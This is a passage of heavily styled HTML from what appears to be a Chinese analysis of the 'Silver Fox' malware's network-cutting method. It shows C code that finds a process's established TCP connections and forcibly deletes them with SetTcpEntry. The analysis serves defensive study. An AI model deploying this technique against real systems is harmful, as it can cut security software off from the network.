style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwNumEntries</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">++</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">MIB_TCPROW2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">table</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwOwningPid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_ESTAB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">MIB_TCPROW2 rowToSet </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">rowToSet</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MIB_TCP_STATE_DELETE_TCB</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">SetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">PMIB_TCPROW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">rowToSet</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span 